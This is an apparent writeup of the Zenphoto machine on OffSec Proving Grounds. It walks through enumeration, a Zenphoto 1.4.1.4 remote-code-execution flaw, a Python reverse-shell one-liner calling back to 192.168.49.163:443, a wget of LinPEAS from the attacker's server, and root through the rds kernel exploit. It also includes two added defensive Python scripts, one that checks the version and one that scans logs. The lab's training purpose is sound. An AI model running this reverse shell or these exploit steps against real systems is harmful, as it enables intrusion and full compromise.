Zenphoto
Writeup for Zenphoto from offsec Proving Grounds
Information Gathering
sudo ./nmapAutomator.sh 192.168.163.41 all
Service Enumeration
HTTP (Port 80)
gobuster dir -u http://192.168.163.41/ -w /usr/share/dirb/wordlists/common.txt -t 40
We see /test and /index, which are of interest.
/index
Seems like it's just a blank page.
/test
/test looks more interesting, and we can see that it is powered by Zenphoto.
Let's try to see if we can find the version number.
Looks like this is running Zenphoto 1.4.1.4.
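The version check above is done by eye; for an inventory or periodic self-check it is worth automating. The following is an added example (not code from the writeup or from the Zenphoto project): it pulls a "Zenphoto x.y.z.w" string out of a fetched page body and compares it to 1.4.1.4, the release identified here. The footer markup in SAMPLE_HTML and the assumption that the version appears as plain "Zenphoto <version>" text are constructed for the example.

```python
import re

# Assumed fingerprint format (not taken from the writeup): the version string
# appears somewhere in the HTML as "Zenphoto <major>.<minor>[.<patch>...]".
VERSION_RE = re.compile(r"Zenphoto\s+v?(\d+(?:\.\d+)+)", re.IGNORECASE)

# The release the writeup identifies as affected by the ajax_create_folder.php issue.
AFFECTED_MAX = "1.4.1.4"


def extract_version(html: str):
    """Return the first Zenphoto version string found in the page, or None."""
    m = VERSION_RE.search(html)
    return m.group(1) if m else None


def version_tuple(v: str):
    """'1.4.1.4' -> (1, 4, 1, 4); components are compared numerically, left to right."""
    return tuple(int(p) for p in v.split("."))


def is_at_or_below(found: str, reference: str = AFFECTED_MAX) -> bool:
    """True when found <= reference; the shorter tuple is padded with zeros
    so that '1.4.1' compares as '1.4.1.0'."""
    a, b = version_tuple(found), version_tuple(reference)
    n = max(len(a), len(b))
    a += (0,) * (n - len(a))
    b += (0,) * (n - len(b))
    return a <= b


def assess(html: str) -> dict:
    """Inventory verdict for one fetched page body."""
    v = extract_version(html)
    if v is None:
        return {"version": None, "flag": "unknown"}
    return {"version": v, "flag": "review" if is_at_or_below(v) else "ok"}


# Constructed sample response body, not from a real server.
SAMPLE_HTML = '<div id="footer">Powered by <a href="#">Zenphoto 1.4.1.4</a></div>'

if __name__ == "__main__":
    print(assess(SAMPLE_HTML))
```

Feed assess() the body returned by your own Zenphoto instance; "unknown" means the theme does not print a version and the check has to fall back to looking at the installed files instead.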
A quick Google search shows that Zenphoto 1.4.1.4 is vulnerable to an 'ajax_create_folder.php' Remote Code Execution.
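From the defender's side, the useful artefact of this step is the web server access log: any request that reaches ajax_create_folder.php on a Zenphoto host is worth an alert. The following is an added example (not code from the writeup or from Zenphoto) that parses combined-format access-log lines and reports every hit on that script, marking whether the server actually served it. It matches on the file name only, because the writeup does not give the directory the script lives in; the /test/zp-core/ path, IPs and timestamps in SAMPLE_LOG are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Script named in the writeup; only the basename is matched, so the detector does
# not depend on the plugin directory it sits under (not given in the writeup).
SUSPECT_SCRIPTS = {"ajax_create_folder.php"}


def parse_line(line: str):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["path"] = urlsplit(d["target"]).path   # drop the query string
    d["status"] = int(d["status"])
    return d


def detect(lines):
    """Return one finding per request whose path ends in a suspect script name.

    A 2xx/3xx status means the script was served (still reachable); a 4xx means
    a block or missing file, which is still worth recording as an attempt.
    """
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        name = rec["path"].rsplit("/", 1)[-1].lower()
        if name in SUSPECT_SCRIPTS:
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "method": rec["method"],
                "path": rec["path"],
                "status": rec["status"],
                "served": rec["status"] < 400,
            })
    return findings


def per_source(findings):
    """Count findings per client IP so repeated probing stands out."""
    return dict(Counter(f["ip"] for f in findings))


# Constructed sample log lines (not from the writeup).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:14:01:02 +0000] "GET /test/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2023:14:01:30 +0000] "POST /test/zp-core/ajax_create_folder.php HTTP/1.1" 200 312 "-" "python-requests/2.31"',
    '10.0.0.5 - - [10/Oct/2023:14:01:31 +0000] "GET /test/zp-core/ajax_create_folder.php?foo=bar HTTP/1.1" 200 300 "-" "python-requests/2.31"',
    '10.0.0.9 - - [10/Oct/2023:14:05:00 +0000] "GET /test/zp-core/ajax_create_folder.php HTTP/1.1" 403 199 "-" "curl/8.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
    print(per_source(detect(SAMPLE_LOG)))
```

Run it over the real access log (for example, detect(open("/var/log/apache2/access.log"))); a "served": True hit on a 1.4.1.4 install means the upload path is live and the install should be upgraded or the script blocked at the web server.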
Exploit
Now that we have a shell, we can use Python to get a more stable reverse shell.
Payload: export RHOST="192.168.49.163";export RPORT=443;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
Privesc
Next, we can start a Python HTTP server to get LinPEAS onto the machine.
Attacking machine: python3 -m http.server 8000
Target machine: wget 192.168.49.163:8000/opt/PEASS-ng/linPEAS/linpeas
From linpeas, we see that there are kernel exploits for this version of the kernel.
We tried the first one, dirtycow 2, but it didn't work well, so we tried the second one, rds, and it worked.
We can use our Python HTTP server to get rds onto the target machine.
And we get root after running rds.